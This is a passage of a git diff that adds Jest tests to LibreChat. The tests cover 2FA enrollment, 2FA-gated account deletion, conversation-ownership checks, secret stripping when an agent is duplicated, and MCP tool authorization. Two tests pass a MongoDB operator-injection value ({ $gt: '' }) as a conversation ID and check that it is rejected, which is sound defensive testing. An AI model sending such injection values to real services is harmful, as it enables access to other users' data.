res = {}; + res.status = jest.fn().mockReturnValue(res); + res.json = jest.fn().mockReturnValue(res); + return res; +} + +const PLAIN_CODES = ['code1', 'code2', 'code3']; +const CODE_OBJECTS = [ + { codeHash: 'h1', used: false, usedAt: null }, + { codeHash: 'h2', used: false, usedAt: null }, + { codeHash: 'h3', used: false, usedAt: null }, +]; + +beforeEach(() => { + jest.clearAllMocks(); + mockGenerateTOTPSecret.mockReturnValue('NEWSECRET'); + mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS }); + mockEncryptV3.mockReturnValue('encrypted-secret'); +}); + +describe('enable2FA', () => { + it('allows first-time setup without token — writes to pending fields', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith( + expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }), + ); + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + const updateCall = mockUpdateUser.mock.calls[0][1]; + expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret'); + expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS); + expect(updateCall).not.toHaveProperty('twoFactorEnabled'); + expect(updateCall).not.toHaveProperty('totpSecret'); + expect(updateCall).not.toHaveProperty('backupCodes'); + }); + + it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + email: 'a@b.com', + }; + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: '123456', + backupCode: undefined, + persistBackupUse: false, + }); + expect(res.status).toHaveBeenCalledWith(200); + const updateCall = mockUpdateUser.mock.calls[0][1]; + expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret'); + expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS); + expect(updateCall).not.toHaveProperty('twoFactorEnabled'); + expect(updateCall).not.toHaveProperty('totpSecret'); + }); + + it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => { + const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } }; + const res = createRes(); + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + email: 'a@b.com', + }; + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({ email: 'a@b.com' }); + + await enable2FA(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith( + expect.objectContaining({ persistBackupUse: false }), + ); + expect(res.status).toHaveBeenCalledWith(200); + }); + + it('returns error when no token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + expect(mockUpdateUser).not.toHaveBeenCalled(); + }); + + it('returns 401 when invalid token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await enable2FA(req, res); + + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + expect(mockUpdateUser).not.toHaveBeenCalled(); + }); +}); + +describe('regenerateBackupCodes', () => { + it('returns 404 when user not found', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue(null); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(404); + expect(res.json).toHaveBeenCalledWith({ message: 'User not found' }); + }); + + it('requires OTP when 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({}); + + await regenerateBackupCodes(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith({ + backupCodes: PLAIN_CODES, + backupCodesHash: CODE_OBJECTS, + }); + }); + + it('returns error when no token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + }); + + it('returns 401 when invalid token provided and 2FA is enabled', async () => { + const req = { user: { id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await regenerateBackupCodes(req, res); + + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + }); + + it('includes backupCodesHash in response', async () => { + const req = { user: { id: 'user1' }, body: { token: '123456' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + mockUpdateUser.mockResolvedValue({}); + + await regenerateBackupCodes(req, res); + + const responseBody = res.json.mock.calls[0][0]; + expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS); + expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES); + }); + + it('allows regeneration without token when 2FA is not enabled', async () => { + const req = { user: { id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: false, + }); + mockUpdateUser.mockResolvedValue({}); + + await regenerateBackupCodes(req, res); + + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.json).toHaveBeenCalledWith({ + backupCodes: PLAIN_CODES, + backupCodesHash: CODE_OBJECTS, + }); + }); +}); diff --git a/api/server/controllers/__tests__/deleteUser.spec.js b/api/server/controllers/__tests__/deleteUser.spec.js new file mode 100644 index 0000000000..d0f54a046f --- /dev/null +++ b/api/server/controllers/__tests__/deleteUser.spec.js @@ -0,0 +1,302 @@ +const mockGetUserById = jest.fn(); +const mockDeleteMessages = jest.fn(); +const mockDeleteAllUserSessions = jest.fn(); +const mockDeleteUserById = jest.fn(); +const mockDeleteAllSharedLinks = jest.fn(); +const mockDeletePresets = jest.fn(); +const mockDeleteUserKey = jest.fn(); +const mockDeleteConvos = jest.fn(); +const mockDeleteFiles = jest.fn(); +const mockGetFiles = jest.fn(); +const mockUpdateUserPlugins = jest.fn(); +const mockUpdateUser = jest.fn(); +const mockFindToken = jest.fn(); +const mockVerifyOTPOrBackupCode = jest.fn(); +const mockDeleteUserPluginAuth = jest.fn(); +const mockProcessDeleteRequest = jest.fn(); +const mockDeleteToolCalls = jest.fn(); +const mockDeleteUserAgents = jest.fn(); +const mockDeleteUserPrompts = jest.fn(); + +jest.mock('@librechat/data-schemas', () => ({ + logger: { error: jest.fn(), info: jest.fn() }, + webSearchKeys: [], +})); + +jest.mock('librechat-data-provider', () => ({ + Tools: {}, + CacheKeys: {}, + Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' }, + FileSources: {}, +})); + +jest.mock('@librechat/api', () => ({ + MCPOAuthHandler: {}, + MCPTokenStorage: {}, + normalizeHttpError: jest.fn(), + extractWebSearchEnvVars: jest.fn(), +})); + +jest.mock('~/models', () => ({ + deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args), + deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args), + updateUserPlugins: (...args) => mockUpdateUserPlugins(...args), + deleteUserById: (...args) => mockDeleteUserById(...args), + deleteMessages: (...args) => mockDeleteMessages(...args), + deletePresets: (...args) => mockDeletePresets(...args), + deleteUserKey: (...args) => mockDeleteUserKey(...args), + getUserById: (...args) => mockGetUserById(...args), + deleteConvos: (...args) => mockDeleteConvos(...args), + deleteFiles: (...args) => mockDeleteFiles(...args), + updateUser: (...args) => mockUpdateUser(...args), + findToken: (...args) => mockFindToken(...args), + getFiles: (...args) => mockGetFiles(...args), +})); + +jest.mock('~/db/models', () => ({ + ConversationTag: { deleteMany: jest.fn() }, + AgentApiKey: { deleteMany: jest.fn() }, + Transaction: { deleteMany: jest.fn() }, + MemoryEntry: { deleteMany: jest.fn() }, + Assistant: { deleteMany: jest.fn() }, + AclEntry: { deleteMany: jest.fn() }, + Balance: { deleteMany: jest.fn() }, + Action: { deleteMany: jest.fn() }, + Group: { updateMany: jest.fn() }, + Token: { deleteMany: jest.fn() }, + User: {}, +})); + +jest.mock('~/server/services/PluginService', () => ({ + updateUserPluginAuth: jest.fn(), + deleteUserPluginAuth: (...args) => mockDeleteUserPluginAuth(...args), +})); + +jest.mock('~/server/services/twoFactorService', () => ({ + verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args), +})); + +jest.mock('~/server/services/AuthService', () => ({ + verifyEmail: jest.fn(), + resendVerificationEmail: jest.fn(), +})); + +jest.mock('~/config', () => ({ + getMCPManager: jest.fn(), + getFlowStateManager: jest.fn(), + getMCPServersRegistry: jest.fn(), +})); + +jest.mock('~/server/services/Config/getCachedTools', () => ({ + invalidateCachedTools: jest.fn(), +})); + +jest.mock('~/server/services/Files/S3/crud', () => ({ + needsRefresh: jest.fn(), + getNewS3URL: jest.fn(), +})); + +jest.mock('~/server/services/Files/process', () => ({ + processDeleteRequest: (...args) => mockProcessDeleteRequest(...args), +})); + +jest.mock('~/server/services/Config', () => ({ + getAppConfig: jest.fn(), +})); + +jest.mock('~/models/ToolCall', () => ({ + deleteToolCalls: (...args) => mockDeleteToolCalls(...args), +})); + +jest.mock('~/models/Prompt', () => ({ + deleteUserPrompts: (...args) => mockDeleteUserPrompts(...args), +})); + +jest.mock('~/models/Agent', () => ({ + deleteUserAgents: (...args) => mockDeleteUserAgents(...args), +})); + +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(), +})); + +const { deleteUserController } = require('~/server/controllers/UserController'); + +function createRes() { + const res = {}; + res.status = jest.fn().mockReturnValue(res); + res.json = jest.fn().mockReturnValue(res); + res.send = jest.fn().mockReturnValue(res); + return res; +} + +function stubDeletionMocks() { + mockDeleteMessages.mockResolvedValue(); + mockDeleteAllUserSessions.mockResolvedValue(); + mockDeleteUserKey.mockResolvedValue(); + mockDeletePresets.mockResolvedValue(); + mockDeleteConvos.mockResolvedValue(); + mockDeleteUserPluginAuth.mockResolvedValue(); + mockDeleteUserById.mockResolvedValue(); + mockDeleteAllSharedLinks.mockResolvedValue(); + mockGetFiles.mockResolvedValue([]); + mockProcessDeleteRequest.mockResolvedValue(); + mockDeleteFiles.mockResolvedValue(); + mockDeleteToolCalls.mockResolvedValue(); + mockDeleteUserAgents.mockResolvedValue(); + mockDeleteUserPrompts.mockResolvedValue(); +} + +beforeEach(() => { + jest.clearAllMocks(); + stubDeletionMocks(); +}); + +describe('deleteUserController - 2FA enforcement', () => { + it('proceeds with deletion when 2FA is not enabled', async () => { + const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false }); + + await deleteUserController(req, res); + + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled(); + }); + + it('proceeds with deletion when user has no 2FA record', async () => { + const req = { user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue(null); + + await deleteUserController(req, res); + + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + }); + + it('returns error when 2FA is enabled and verification fails with 400', async () => { + const req = { user: { id: 'user1', _id: 'user1' }, body: {} }; + const res = createRes(); + mockGetUserById.mockResolvedValue({ + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 }); + + await deleteUserController(req, res); + + expect(res.status).toHaveBeenCalledWith(400); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + }); + + it('returns 401 when 2FA is enabled and invalid TOTP token provided', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }; + const req = { user: { id: 'user1', _id: 'user1' }, body: { token: 'wrong' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: 'wrong', + backupCode: undefined, + }); + expect(res.status).toHaveBeenCalledWith(401); + expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' }); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + }); + + it('returns 401 when 2FA is enabled and invalid backup code provided', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + backupCodes: [], + }; + const req = { user: { id: 'user1', _id: 'user1' }, body: { backupCode: 'bad-code' } }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ + verified: false, + status: 401, + message: 'Invalid token or backup code', + }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: undefined, + backupCode: 'bad-code', + }); + expect(res.status).toHaveBeenCalledWith(401); + expect(mockDeleteMessages).not.toHaveBeenCalled(); + }); + + it('deletes account when valid TOTP token provided with 2FA enabled', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + }; + const req = { + user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, + body: { token: '123456' }, + }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: '123456', + backupCode: undefined, + }); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + }); + + it('deletes account when valid backup code provided with 2FA enabled', async () => { + const existingUser = { + _id: 'user1', + twoFactorEnabled: true, + totpSecret: 'enc-secret', + backupCodes: [{ codeHash: 'h1', used: false }], + }; + const req = { + user: { id: 'user1', _id: 'user1', email: 'a@b.com' }, + body: { backupCode: 'valid-code' }, + }; + const res = createRes(); + mockGetUserById.mockResolvedValue(existingUser); + mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true }); + + await deleteUserController(req, res); + + expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({ + user: existingUser, + token: undefined, + backupCode: 'valid-code', + }); + expect(res.status).toHaveBeenCalledWith(200); + expect(res.send).toHaveBeenCalledWith({ message: 'User deleted' }); + expect(mockDeleteMessages).toHaveBeenCalled(); + }); +}); diff --git a/api/server/controllers/agents/__tests__/openai.spec.js b/api/server/controllers/agents/__tests__/openai.spec.js index 835343e798..50c61b7288 100644 --- a/api/server/controllers/agents/__tests__/openai.spec.js +++ b/api/server/controllers/agents/__tests__/openai.spec.js @@ -99,6 +99,7 @@ jest.mock('~/server/services/PermissionService', () => ({ jest.mock('~/models/Conversation', () => ({ getConvoFiles: jest.fn().mockResolvedValue([]), + getConvo: jest.fn().mockResolvedValue(null), })); jest.mock('~/models/Agent', () => ({ @@ -160,6 +161,77 @@ describe('OpenAIChatCompletionController', () => { }; }); + describe('conversation ownership validation', () => { + it('should skip ownership check when conversation_id is not provided', async () => { + const { getConvo } = require('~/models/Conversation'); + await OpenAIChatCompletionController(req, res); + expect(getConvo).not.toHaveBeenCalled(); + }); + + it('should return 400 when conversation_id is not a string', async () => { + const { validateRequest } = require('@librechat/api'); + validateRequest.mockReturnValueOnce({ + request: { model: 'agent-123', messages: [], stream: false, conversation_id: { $gt: '' } }, + }); + + await OpenAIChatCompletionController(req, res); + expect(res.status).toHaveBeenCalledWith(400); + }); + + it('should return 404 when conversation is not owned by user', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockResolvedValueOnce(null); + + await OpenAIChatCompletionController(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'convo-abc'); + expect(res.status).toHaveBeenCalledWith(404); + }); + + it('should proceed when conversation is owned by user', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockResolvedValueOnce({ conversationId: 'convo-abc', user: 'user-123' }); + + await OpenAIChatCompletionController(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'convo-abc'); + expect(res.status).not.toHaveBeenCalledWith(404); + }); + + it('should return 500 when getConvo throws a DB error', async () => { + const { validateRequest } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + messages: [], + stream: false, + conversation_id: 'convo-abc', + }, + }); + getConvo.mockRejectedValueOnce(new Error('DB connection failed')); + + await OpenAIChatCompletionController(req, res); + expect(res.status).toHaveBeenCalledWith(500); + }); + }); + describe('token usage recording', () => { it('should call recordCollectedUsage after successful non-streaming completion', async () => { await OpenAIChatCompletionController(req, res); diff --git a/api/server/controllers/agents/__tests__/responses.unit.spec.js b/api/server/controllers/agents/__tests__/responses.unit.spec.js index 45ec31fc68..e34f0ccf73 100644 --- a/api/server/controllers/agents/__tests__/responses.unit.spec.js +++ b/api/server/controllers/agents/__tests__/responses.unit.spec.js @@ -189,6 +189,102 @@ describe('createResponse controller', () => { }; }); + describe('conversation ownership validation', () => { + it('should skip ownership check when previous_response_id is not provided', async () => { + const { getConvo } = require('~/models/Conversation'); + await createResponse(req, res); + expect(getConvo).not.toHaveBeenCalled(); + }); + + it('should return 400 when previous_response_id is not a string', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: { $gt: '' }, + }, + }); + + await createResponse(req, res); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 400, + 'previous_response_id must be a string', + 'invalid_request', + ); + }); + + it('should return 404 when conversation is not owned by user', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockResolvedValueOnce(null); + + await createResponse(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'resp_abc'); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 404, + 'Conversation not found', + 'not_found', + ); + }); + + it('should proceed when conversation is owned by user', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockResolvedValueOnce({ conversationId: 'resp_abc', user: 'user-123' }); + + await createResponse(req, res); + expect(getConvo).toHaveBeenCalledWith('user-123', 'resp_abc'); + expect(sendResponsesErrorResponse).not.toHaveBeenCalledWith( + res, + 404, + expect.any(String), + expect.any(String), + ); + }); + + it('should return 500 when getConvo throws a DB error', async () => { + const { validateResponseRequest, sendResponsesErrorResponse } = require('@librechat/api'); + const { getConvo } = require('~/models/Conversation'); + validateResponseRequest.mockReturnValueOnce({ + request: { + model: 'agent-123', + input: 'Hello', + stream: false, + previous_response_id: 'resp_abc', + }, + }); + getConvo.mockRejectedValueOnce(new Error('DB connection failed')); + + await createResponse(req, res); + expect(sendResponsesErrorResponse).toHaveBeenCalledWith( + res, + 500, + expect.any(String), + expect.any(String), + ); + }); + }); + describe('token usage recording - non-streaming', () => { it('should call recordCollectedUsage after successful non-streaming completion', async () => { await createResponse(req, res); diff --git a/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js b/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js new file mode 100644 index 0000000000..cc298bd03a --- /dev/null +++ b/api/server/controllers/agents/__tests__/v1.duplicate-actions.spec.js @@ -0,0 +1,159 @@ +jest.mock('~/server/services/PermissionService', () => ({ + findPubliclyAccessibleResources: jest.fn(), + findAccessibleResources: jest.fn(), + hasPublicPermission: jest.fn(), + grantPermission: jest.fn().mockResolvedValue({}), +})); + +jest.mock('~/server/services/Config', () => ({ + getCachedTools: jest.fn(), + getMCPServerTools: jest.fn(), +})); + +const mongoose = require('mongoose'); +const { actionDelimiter } = require('librechat-data-provider'); +const { agentSchema, actionSchema } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); +const { duplicateAgent } = require('../v1'); + +let mongoServer; + +beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + if (!mongoose.models.Agent) { + mongoose.model('Agent', agentSchema); + } + if (!mongoose.models.Action) { + mongoose.model('Action', actionSchema); + } + await mongoose.connect(mongoUri); +}, 20000); + +afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); +}); + +beforeEach(async () => { + await mongoose.models.Agent.deleteMany({}); + await mongoose.models.Action.deleteMany({}); +}); + +describe('duplicateAgentHandler — action domain extraction', () => { + it('builds duplicated action entries using metadata.domain, not action_id', async () => { + const userId = new mongoose.Types.ObjectId(); + const originalAgentId = `agent_original`; + + const agent = await mongoose.models.Agent.create({ + id: originalAgentId, + name: 'Test Agent', + author: userId.toString(), + provider: 'openai', + model: 'gpt-4', + tools: [], + actions: [`api.example.com${actionDelimiter}act_original`], + versions: [{ name: 'Test Agent', createdAt: new Date(), updatedAt: new Date() }], + }); + + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_original', + agent_id: originalAgentId, + metadata: { domain: 'api.example.com' }, + }); + + const req = { + params: { id: agent.id }, + user: { id: userId.toString() }, + }; + const res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + + await duplicateAgent(req, res); + + expect(res.status).toHaveBeenCalledWith(201); + + const { agent: newAgent, actions: newActions } = res.json.mock.calls[0][0]; + + expect(newAgent.id).not.toBe(originalAgentId); + expect(String(newAgent.author)).toBe(userId.toString()); + expect(newActions).toHaveLength(1); + expect(newActions[0].metadata.domain).toBe('api.example.com'); + expect(newActions[0].agent_id).toBe(newAgent.id); + + for (const actionEntry of newAgent.actions) { + const [domain, actionId] = actionEntry.split(actionDelimiter); + expect(domain).toBe('api.example.com'); + expect(actionId).toBeTruthy(); + expect(actionId).not.toBe('act_original'); + } + + const allActions = await mongoose.models.Action.find({}).lean(); + expect(allActions).toHaveLength(2); + + const originalAction = allActions.find((a) => a.action_id === 'act_original'); + expect(originalAction.agent_id).toBe(originalAgentId); + + const duplicatedAction = allActions.find((a) => a.action_id !== 'act_original'); + expect(duplicatedAction.agent_id).toBe(newAgent.id); + expect(duplicatedAction.metadata.domain).toBe('api.example.com'); + }); + + it('strips sensitive metadata fields from duplicated actions', async () => { + const userId = new mongoose.Types.ObjectId(); + const originalAgentId = 'agent_sensitive'; + + await mongoose.models.Agent.create({ + id: originalAgentId, + name: 'Sensitive Agent', + author: userId.toString(), + provider: 'openai', + model: 'gpt-4', + tools: [], + actions: [`secure.api.com${actionDelimiter}act_secret`], + versions: [{ name: 'Sensitive Agent', createdAt: new Date(), updatedAt: new Date() }], + }); + + await mongoose.models.Action.create({ + user: userId, + action_id: 'act_secret', + agent_id: originalAgentId, + metadata: { + domain: 'secure.api.com', + api_key: 'sk-secret-key-12345', + oauth_client_id: 'client_id_xyz', + oauth_client_secret: 'client_secret_xyz', + }, + }); + + const req = { + params: { id: originalAgentId }, + user: { id: userId.toString() }, + }; + const res = { + status: jest.fn().mockReturnThis(), + json: jest.fn(), + }; + + await duplicateAgent(req, res); + + expect(res.status).toHaveBeenCalledWith(201); + + const duplicatedAction = await mongoose.models.Action.findOne({ + agent_id: { $ne: originalAgentId }, + }).lean(); + + expect(duplicatedAction.metadata.domain).toBe('secure.api.com'); + expect(duplicatedAction.metadata.api_key).toBeUndefined(); + expect(duplicatedAction.metadata.oauth_client_id).toBeUndefined(); + expect(duplicatedAction.metadata.oauth_client_secret).toBeUndefined(); + + const originalAction = await mongoose.models.Action.findOne({ + action_id: 'act_secret', + }).lean(); + expect(originalAction.metadata.api_key).toBe('sk-secret-key-12345'); + }); +}); diff --git a/api/server/controllers/agents/client.js b/api/server/controllers/agents/client.js index 0ecd62b819..c454bd65cf 100644 --- a/api/server/controllers/agents/client.js +++ b/api/server/controllers/agents/client.js @@ -44,6 +44,7 @@ const { isEphemeralAgentId, removeNullishValues, } = require('librechat-data-provider'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens'); const { encodeAndFormat } = require('~/server/services/Files/images/encode'); const { updateBalance, bulkInsertTransactions } = require('~/models'); @@ -479,6 +480,7 @@ class AgentClient extends BaseClient { getUserKeyValues: db.getUserKeyValues, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); diff --git a/api/server/controllers/agents/filterAuthorizedTools.spec.js b/api/server/controllers/agents/filterAuthorizedTools.spec.js new file mode 100644 index 0000000000..259e41fb0d --- /dev/null +++ b/api/server/controllers/agents/filterAuthorizedTools.spec.js @@ -0,0 +1,677 @@ +const mongoose = require('mongoose'); +const { v4: uuidv4 } = require('uuid'); +const { Constants } = require('librechat-data-provider'); +const { agentSchema } = require('@librechat/data-schemas'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +const d = Constants.mcp_delimiter; + +const mockGetAllServerConfigs = jest.fn(); + +jest.mock('~/server/services/Config', () => ({ + getCachedTools: jest.fn().mockResolvedValue({ + web_search: true, + execute_code: true, + file_search: true, + }), +})); + +jest.mock('~/config', () => ({ + getMCPServersRegistry: jest.fn(() => ({ + getAllServerConfigs: mockGetAllServerConfigs, + })), +})); + +jest.mock('~/models/Project', () => ({ + getProjectByName: jest.fn().mockResolvedValue(null), +})); + +jest.mock('~/server/services/Files/strategies', () => ({ + getStrategyFunctions: jest.fn(), +})); + +jest.mock('~/server/services/Files/images/avatar', () => ({ + resizeAvatar: jest.fn(), +})); + +jest.mock('~/server/services/Files/S3/crud', () => ({ + refreshS3Url: jest.fn(), +})); + +jest.mock('~/server/services/Files/process', () => ({ + filterFile: jest.fn(), +})); + +jest.mock('~/models/Action', () => ({ + updateAction: jest.fn(), + getActions: jest.fn().mockResolvedValue([]), +})); + +jest.mock('~/models/File', () => ({ + deleteFileByFilter: jest.fn(), +})); + +jest.mock('~/server/services/PermissionService', () => ({ + findAccessibleResources: jest.fn().mockResolvedValue([]), + findPubliclyAccessibleResources: jest.fn().mockResolvedValue([]), + grantPermission: jest.fn(), + hasPublicPermission: jest.fn().mockResolvedValue(false), + checkPermission: jest.fn().mockResolvedValue(true), +})); + +jest.mock('~/models', () => ({ + getCategoriesWithCounts: jest.fn(), +})); + +jest.mock('~/cache', () => ({ + getLogStores: jest.fn(() => ({ + get: jest.fn(), + set: jest.fn(), + delete: jest.fn(), + })), +})); + +const { + filterAuthorizedTools, + createAgent: createAgentHandler, + updateAgent: updateAgentHandler, + duplicateAgent: duplicateAgentHandler, + revertAgentVersion: revertAgentVersionHandler, +} = require('./v1'); + +const { getMCPServersRegistry } = require('~/config'); + +let Agent; + +describe('MCP Tool Authorization', () => { + let mongoServer; + let mockReq; + let mockRes; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + const mongoUri = mongoServer.getUri(); + await mongoose.connect(mongoUri); + Agent = mongoose.models.Agent || mongoose.model('Agent', agentSchema); + }, 20000); + + 